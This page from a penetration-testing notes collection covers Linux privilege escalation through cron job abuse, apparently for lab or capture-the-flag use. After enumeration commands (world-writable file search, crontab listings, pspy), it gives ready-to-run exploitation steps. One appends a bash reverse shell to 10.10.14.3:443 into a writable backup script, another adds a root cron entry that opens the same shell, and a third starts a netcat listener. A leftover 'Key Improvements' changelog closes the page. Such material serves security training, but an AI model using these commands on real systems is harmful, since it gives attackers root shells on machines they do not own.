12.Cron-job-abuse

Find World-Writable Files (Potential Cron Job Scripts)

World-writable files could be abused for privilege escalation if executed by a higher-privileged user.

find / -path /proc -prune -o -type f -perm -o+w -exec ls -lah {} + 2>/dev/null

-path /proc -prune → Excludes /proc to avoid unnecessary noise.
-type f -perm -o+w → Finds world-writable files.
-exec ls -lah {} + → Displays detailed information.

List Files in a Suspicious Directory

If a backup or script directory is writable, it could be used for privilege escalation.

ls -lah /dmz-backups/

Check for writable files (w permission) and ownership.

Check Cron Jobs (If You Have Permissions)

List user and system-wide cron jobs:

crontab -l                # Current user's cron jobs  
sudo crontab -l           # Root user's cron jobs (if accessible)  
cat /etc/crontab          # System-wide cron jobs

Check `/etc/cron.d/` for Scheduled Jobs

Cron jobs in /etc/cron.d/ might be running scripts as privileged users.

ls -lah /etc/cron.d/
cat /etc/cron.d/* 2>/dev/null  # View contents if readable

Use `pspy` to Monitor Background Processes

pspy is a powerful tool for identifying scripts executed by cron jobs.

Download pspy (Choose the Right Architecture)

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

Make it Executable

chmod +x pspy64

Run pspy to Monitor Processes

./pspy64 -pf -i 1000

Modify a Vulnerable Script (Example: `/dmz-backups/backup.sh`)

Backup the Original Script

cp /dmz-backups/backup.sh /dmz-backups/backup.sh.bak

Append a Reverse Shell Payload

echo "bash -i >& /dev/tcp/10.10.14.3/443 0>&1" >> /dmz-backups/backup.sh

Start a Netcat Listener (On Your Attacking Machine)

nc -lnvp 443

Restore the Original Script After Testing

cp /dmz-backups/backup.sh.bak /dmz-backups/backup.sh

Modify a Writable Cron Job File (Example: `/etc/cron.d/vulnerable_cron`)

Backup the File

cp /etc/cron.d/vulnerable_cron /etc/cron.d/vulnerable_cron.bak

Append a Malicious Cron Job

echo "* * * * * root bash -c 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1'" >> /etc/cron.d/vulnerable_cron

Restore the Original Cron File

cp /etc/cron.d/vulnerable_cron.bak /etc/cron.d/vulnerable_cron

Key Improvements and Explanations:

find command: The find command now includes -path /proc -prune to avoid traversing the /proc filesystem, which can cause performance issues.
crontab commands: Added both user and root crontab -l commands.
cron.d directory: Included a command to list the contents of /etc/cron.d/.
pspy download: Added a wget command to download pspy. You'll need to adjust the URL if a newer version is available or for a different architecture.
Script backup: Emphasized the importance of backing up the original script before modifying it.
Reverse shell: Provided an example of a Bash one-liner reverse shell.
Netcat listener: Included the nc command to start a listener.
Cron.d file modification: Added an example of how to modify a vulnerable file in /etc/cron.d/, including backup and restore commands.
Safety: The commands are now formatted to highlight their potential danger.
Clarity: Improved explanations of each command's purpose.

Previous11.Vulnerable-services NextLXC Privilege Escalation Techniques

Last updated 8 months ago

hashtagFind World-Writable Files (Potential Cron Job Scripts)

hashtagList Files in a Suspicious Directory

hashtagCheck Cron Jobs (If You Have Permissions)

hashtagCheck /etc/cron.d/ for Scheduled Jobs

hashtagUse pspy to Monitor Background Processes

hashtagModify a Vulnerable Script (Example: /dmz-backups/backup.sh)

hashtagModify a Writable Cron Job File (Example: /etc/cron.d/vulnerable_cron)

hashtagKey Improvements and Explanations: